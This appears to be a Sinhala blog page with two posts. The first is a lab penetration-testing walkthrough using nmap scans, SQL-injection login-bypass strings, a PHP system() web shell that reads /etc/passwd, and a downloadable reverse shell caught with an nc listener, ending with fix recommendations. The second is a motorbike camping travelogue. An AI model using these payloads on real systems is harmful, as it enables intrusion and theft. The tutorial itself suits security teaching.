TRENDING NOW

best sinhala blog in sri lanka
ඔව් ඉතින් පින්වතුනි අද කියන්න හදන්නේ කවුරුත් දන්නා nmap වලින් කොහොමද lan එක scan කරලා ඒකෙ සර්වර් එකකට ඇතුල් වෙන විදිහ


සෙටප් එක ගැන කිව්වෝත් මේකේ කාලි මැෂින් එකයි web for penterster කියල සර්වර් එකකුයි තියෙන්නේ

හරි මුලින්ම මන් ගන්නේ මේකට කාලි ලිනක්ස් එකක්

එකේ terminal එක open කරලා nmap කියල ගහල enter කරන්න

nmap 


එතකොට මේ වගේ හැඳින්වීමක් දෙයි ඔයාලට



දැන් ip addr කියන කමාන්ඩ් එක ගහල අපේ ලෝකල් ip එක බලමු
ip addr


හරි මේ තියෙන්නේ මගේ ලෝකල් ip එක


දැන් අපි බලමු කොහොමද lan එක scan කරන්නේ කියලා
nmap -v -sn 192.168.10.100-150


ඕක ගහල enter කරන්න


 දැන් scan වෙයි


දැන් මෙහෙම එයි



හරි ඔය උඩ තියෙන්නේ අපි scan කරපු එකේ report එක මොනාද on එකේ සහ මොනාද නැත්තේ කියල


දැන් බලමු මොනාද banner එලියට දෙන්නේ කියලා

ඒ කියන්නේ ඔය service එකක් එහෙම රන් වෙනවා නම් එකේ header එක එහෙම පෙන්නන්නේ ඒවා අල්ලන එක තමා මේ




මේ එකේ output එක



මේ තියෙන්නේ ip range එකක තියන පොර්ට් 65536 ම scan කරන කමාන්ඩ් එක
මේක තමා වටින්නේ
nmap -p- 192.168.1.100-150


මේ තියෙන්නේ එක රන් කළාම



හරි මන් දැක්ක දැන් මේකේ ssh පොර්ට් එක open එකේ තියනවා ඉතින් මන් බලනවා මොඅක්ද මේ සර්වර් එක කියලා
ssh 192.168.10.104


ඔන්න මේකේ බැනර් එකක් තියනව
මන් දන්නවා මේක දැන් මොකක් හරි වටිනා සර්වර් එකක් කියලා හැබැයි මන් මේකේ username වත් පාස්වර්ඩ් වත් දන්නේ නෑ



දැන් මන් කරන්න හදන්නේ මේකේ os එක මොකක්ද කියල බලන්න
nmap -O 192.168.10.104


ඔන්න දැන් පේනවා මේකේ විස්තර ටිකක් මොකක්ද os එක සර්විස් මොනාද mac එක මොකක්ද වගේ දේවල් ටිකක්

දැන් බලන්නේ මේකේ http නොහොත් web සර්විස් මොනාද එලියට දීලා තියෙන්නේ කියලා සහ web සර්විස් වල තියන අඩුපාඩු මොනාද කියලා
nmap --script=http-enum 192.168.10.104


මේ තියෙන්නේ තියන සර්විස් සහ ඒවගේ අඩුපාඩු



හරිනේ වැඩේ ආතල් වගේ

දැන් මන් බලනවා මොනාද මේකේ තියන සර්විස් වල version ටික කියල


nmap -sV --version-all 192.168.10.104
nmap -sV --version-intensity 5 192.168.10.104

 ඔය දෙකම පාවිච්චි කරන්න පුළුවන්



ඔයාලට පේනවා ඇති මේ සර්විස් වල version එක බලාගන්න පුළුවන්
මේකේ තියන වටිනාකම තමා මේවගේ පරණ version වල එක එක අවුල් ආව අපිට තියෙන්නේ ඒවා හොයාගෙන ගේම දෙන්න




හරිනේ දැන් මන් browser එක open කරලා මේකේ ip එක ගහනවා web එක ලෝඩ් කරන්න




දැන් පලවෙනි ලින්ක් එකට ගිහින් බලනව මොනාද කරන්න පුළුවන් කියල


හරි දැන් පොඩි sql injection එකක් දීල බලමු


  • admin' --
  • admin' #
  • admin'/*
  • ' or 1=1--
  • ' or 1=1#
  • ' or 1=1/*
  • ') or '1'='1--
  • ') or ('1'='1--

 එකක් දෙකක් ගහල බලන්න වැඩ කරයි


හරි දැන් මන් php එකක් අප්ලෝඩ් කරලා සර්වර් එකේ /etc/passwd ෆයිල් එක read කරන්න හදන්නේ
වැඩේට php ෆයිල් එකක් හදාගන්න මේ කෝඩ් එක දාල


<?php

echo system ($_GET ["val1"].' '.$_GET ["val2"] );


?>
දැන් එක අප්ලෝඩ් කරලා click කරන්න තියෙන්නේ

ඊටපස්සේ url එකේ මේක ගහන්න

http://192.168.10.104/upload/images/simple.php?val1=cat&val2=/etc/passwd

වැඩේ පොඩ්ඩක් ගලපලා ගහන්න
 හරි නම් සර්වර් එකේ පාස්වර්ඩ් file එක පෙන්නයි



දැන් බලමු shell එකක් php වලින් open කරගන්න විදිහ

මේක ගන්න php file එකකට

මේක අරන් මේකේ php-reverse-shell.php එක එඩිට් කරගන්න තමන්ගේ ip සහ පොර්ට් දාල
http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
දැන් ඔකේ අදාළ තැන් වලට ip පොර්ට් එහෙම දීලා save කරලා ඉන්න




දැන් මේ වගේ file අප්ලෝඩ් කරන්න තියන තැනකට ගිහින් අප්ලෝඩ් කරන්න




දැන් කාලි එකේ
nc -nvlp 1234

 කියල ගහල listener එකක් දාගන්න

දැන් අරක අප්ලෝඩ් කරලා රන් කරන්න

වැඩේ හරි නම් මේ වගේ shell එකක් open වෙයි ඔයාගේ machine එකේ

මේ තියෙන්නේ සර්වර් එකේ shell එක



දැන් ඔයාට permission තියනවා නම් කෙලින්ම පුළුවන් user කෙනෙක් add කරලා පාස්වර්ඩ් එකක් දාල එකෙන් ssh වලින් ලොග් වෙන්න නැත්තම් තියන ලොගින් එකක පාස්වර්ඩ් වෙනස් කරලා ssh වලින් ලොග් වෙලා ඕනි දෙයක් කරන්න



Vulnerability අවුල් තැන්

Recommendations to fix weaknesses
❖ SQL injection
• Using of Prepared Statements
• Using Parameterized Queries
• Using of Stored Procedures
• White List Input Validation
• Escaping All User Supplied Input
• Enforcing Least Privilege
• Performing White List Input Validation as a Secondary Defense
❖ File Upload Vulnerability
• Use validated file extensions.
• Limiting upload facility registered users.
• Check the file from the internet for content. Make sure it is the file type we are accepting. • Use other file hosting site to accept files (google drive, MediaFire).
• Restricting users to file storing location.
• Add some random value to file when it storing.
❖ Reverse Shells
• Install good firewall.



best sinhala blog in sri lanka
ඔන්න ඉතින් රෝද දෙකේ රස්තියාදුව කියල පේජ් එකකින් දාපු event එකක් හරියක් ගැන කියන්න තමා පින්වතුනි අද ලැස්ති වෙන්නේ මුහුණු පොතේ තිබ්බ තරඟයකට සහභාගී වෙලා අළුත් යාළුවො සෙට් එකක් එක්ක ගිය සුන්දර ගමනක් ගැන කියන්න තමා මේ හදන්නේ

මුලින්ම අපි මේකේ ඉතිහාස කතාව ගැන බලමුකෝ


(ලයික් කමෙන්ට් කරලා share කරපු හැමෝටම ස්තුති වෙනවා මුලින්ම)

ඔන්න ඔතනින් තමා වැඩේ පටන් ගත්තේ කොහොමත් පට්ටම අවුලෙන් හිටියේ බමුණා සුපුන් කොටා එක්ක පොළොන්නරු යන්න බැරි උන එක ගැන ඉතින් මේ පාර assignment මොකුත් නැති හින්ද  R2R එකේ මද්දට මම කලින්ම Confirm කරලා තිබ්බේ එනවා කියල
මොකද කොටාලත් එක්ක යන්න බැරි උනෙත් assignment එකක් එදාට වැටුන නිසානේ 

හරි ඔන්න ඉතින් advance දාල පහුවදාම මෙන්න සර් exam ටයිම් ටේබල් දෙනවා හරියටම 26 වෙනිදා Exam පටන් ගන්නවා කියල දැන් ඉතින් මොනා කරන්නද මද්දට කිව්වා මෙහෙම අවුලක් තියනව කියල 25 26 අපි දින දාගෙන තියෙන්නේ අනික 25 පෝය දවසකුත් නේ අනේ ඉතින් හරිම දුකෙන් 26 වෙනිදා උදේ එන්න හිත හදාගත්තා ඉතින් ඔහොම දවස් ගෙවිල ගිහින් 24 වෙනිදා ඔෆිස් එකේ නිමාඩුවකුත් දාල ලස්සනට presentation එකත් හදල report එක අනිත් ළමයට හදන්න කියල ඔක්කොම හොඳට තියෙද්දී මෙන්න කියපි වයිරස් ගිහින් Word open වෙන්න හැටපැයක් යනවා කියල හරිනේ ෂෝක් නේ දැන් ඉතින් හිතේ තිබ්බ කේන්තියට රැ 12 වෙනකල් report හදල නිදිමතේ පාන්දර 2කට එලාම් එකත් තියාගෙන නිදාගත්තේ පහුවදා යන ගමන පොරොන්දු උන නිසාම යනවා කියන බලාපොරොත්තුවෙන් ඇයි ඒ මදිවට gopro එකත් ගත්තනේ තිබ්බ කැසිල්ලට, කොහොම උනත් ඉතින් ආසාවක් තිබ්බ කට්ටිය group එකේ හරි හරියට දේවල් කතාවෙනව දැකල මම අලුත් නිසා වැඩිය සෙට් උනෙත් නෑ වැඩ නිසාත්

ඔන්න ඉතින් දෙකට විතර බැරිමරගාතේ නැගිටලා ඇදුම් ටිකත් දාගෙන මද්දට කිව්වා 3 වෙද්දී පිළියන්දලට ඇවිත් ඉන්නම් කියල
එහෙම කියල හරියටම 3 වෙද්දී පිළියන්දලට ගියත් 4 විතර වෙනකල් ඔන්න එතන හම්මේ ඉතින්


ඔන්න ඉතින් කොට්ටාව තමා කට්ටිය සෙට් වෙන තැන, 


මැප් එකේ තිබ්බේ මෙහෙමයි


හිතන් හිටියේ කලින් යන්න උනත් පොඩි පොඩි අවුල් නිසා හිතපු තරම් වෙලාවට යාගන්න බැරි උනා කොහොමත් මග නතර වේවි ගියේ වාහනත් වැඩි පාරේ

පොඩ්ඩක් එළිය වැටීගෙන එද්දී කට්ටියට බඩගින්න දැනුන නිසා කට්ටිය පොඩ්ඩක් නවතින්න බැලුව



මේ පොඩ්ඩක් එලිය වැටුනම දෙවෙනියට නවත්තපු තැන

මෙතනින් රෝල් එකක් කාල ආයෙත් ගමන පටන් ගත්තා

ඊටපස්සේ කොහේදෝ මන්ද වයින් ස්ටෝස් එකක් ගාව නැවතිලා මද්දා කතා කරන්න පටන් ගත්තා
ඔය පහලින් ඉන්නේ තවත් යාලුවෙක් බලන්න එපැයි තේරෙනවා වගේ අහන ඉන්න ලස්සන



අන්න ඔතනදි තමා මද්දා කියන්නේ කට්ටිය පිඟන් කෝප්ප බෙඩ්සිට් එහෙම ගෙනාවනේ නේද කියල

ඔන්න දැන් තමා ඇඟ පොඩ්ඩක් රත් වේගන ආවේ යකෝ මන් මොකුත් ගෙනාවේ නැනේ කියල මොකද කලින් දවසේ අවුලෙන් නිසා මේක අමතක උනා අමතක උනා කියන්නේ ලොවෙත් මතක තියාගෙන හිටියේ කලින් දවසේ කේස් එක හින්දම ඔලුව විකාර වෙලා තිබ්බේ

ඊටපස්සේ මොනා කරන්නද හිත හදන් ගියා උදේ කෑමට නවත්තනකල් කුරුනෑගල












ඊටපස්සේ ඉතින් ආයෙත් ගමනේ තමා

ඔන්න ඉතින් කුරුනෑගල පහු කරලා දඹුල්ලේ කිට්ටුව වගේ තැනක නතර කරා ආයේ
මතක විදිහට, මොකද plan කරලා තිබ්බේ බයික් එකට පෝන් හෝල්ඩර් එකක් එහෙම ගහල පට්ටෙට හදන්න වේලාවක් තිබ්බේ නෑ ඉතින් වැඩ නේ



මේ යන ගමන්



ඔන්න ඉතින් පැය ගානක් ගිහිල්ලා කස්ටිය ආව හබරණ කමතට














කට්ටියත් එක්ක දවල්ට කාල එහෙම ගියා off road අත්දැකීම විඳගන්න

අනිත් ඒවා ටිකත් දාන්නම් ඉක්මනට

ඊටපස්සේ ඇවිල්ල ගියා නාන්න





ඔන්න ඉතින් රෑ වෙද්දී කට්ටියත් එක්ක කුඩාරම් ගහන්න ආව














ඊටපස්සේ කට්ටිය ගිනිමැලේ වටේ ඉඳන් තමන් ගැන පොඩි හැඳින්වීමක් කරා පස්සේ BBQ පාරක් දාල සින්දුවක් එහෙම කියල නින්දට ගියා

event එක ගැන කිව්වොත් මද්දා ඇතුළු R2R එකේ කට්ටියම පුදුම කැපවීමක් කරලා තිබ්බේ මේ වැඩේ ලස්සනට වෙන්න කිසිම අඩුපාඩුවක් නැති වෙන්න මන් එහෙන් මෙහෙන් දැක්ක මද්දා තිවංක අයියා එහෙම නම හරි නම් කියන්නත් හොඳ නෑ හැමෝම ලොකු බරක් අදිනවා හිතේ ගමන පටන් ගන්න කලින් ඉඳන්ම ඒ වගේම ස්තුති වෙනවා කිසිම අඩු පාඩුවක් නැතුව වැඩේ කරලා තිබ්බ එකට, ඒ වගේම ගිය හැමෝම සුපිරිම සෙට් එකක් එදා දැක්කත් බොක්ක උනත් දෙන යාළුවො සෙට් එකක් ඉතින් කරපු උදව් වලට හැමෝටම ස්තුතිවෙනවා මෙහෙම උනා නම් තවත් හොඳයි කියන්න තරම් වත් දෙයක් තිබ්බේ නැතුව event එක කරාට.

ඔන්න දැන් තමා හොඳම සීන් එක එන්නේ
ඔන්න ඉතින් පහුවදා තමා වැඩේ පත්තු උනේ පාන්දර කොළඹ එන්න ඕනි උනත් පාරට ගෙනත් දාන්නම් කියපු ඩයල් එකට නින්ද ගිහින්ද කොහෙද කෝල් ආන්සර් කරන්නේ නෑ දැන් මේ අලි ගහන කැලේ මැද්දේ පාන්දර 4ට දාඩියත් දාගෙන ඉන්නකොට දෙයියෝ බැලුව වගේ කොල්ලෝ දෙන්නෙක් ආව අලි වැට ගාවට එනකල් අන්න ඒක තමා ජිවිතේ බයෙන්ම ආව ගමන
ඔන්න ඉතින් කොහොමින් කොහොමින් හරි 7.45 වෙද්දී කොළඹට එන්න පුළුවන් උනා
රස්තියාදුවේ කට්ටිය පිදුරංගල එහෙම නැගල ඇවිල්ල තිබුනේ මට ඒ අත්දැකීම විඳගන්න වාසනාවක් නැති උනත් ඔහොම හරි ගිහින් එන්න හම්බුනා එක ගැන සතුටු වෙනවා
ඉතින් කියන්න තියෙන්නේ මුහුනුපොතෙන් හම්බුනා යාළුවො ඔක්කොටොම පිං සිද්ද වෙන්න මේ වගේ ගමනක් යන්න වාසනාව හිමිකරගත්තා ඒ වගේම හොඳ යාළුවො වගේකුත් හම්බුනා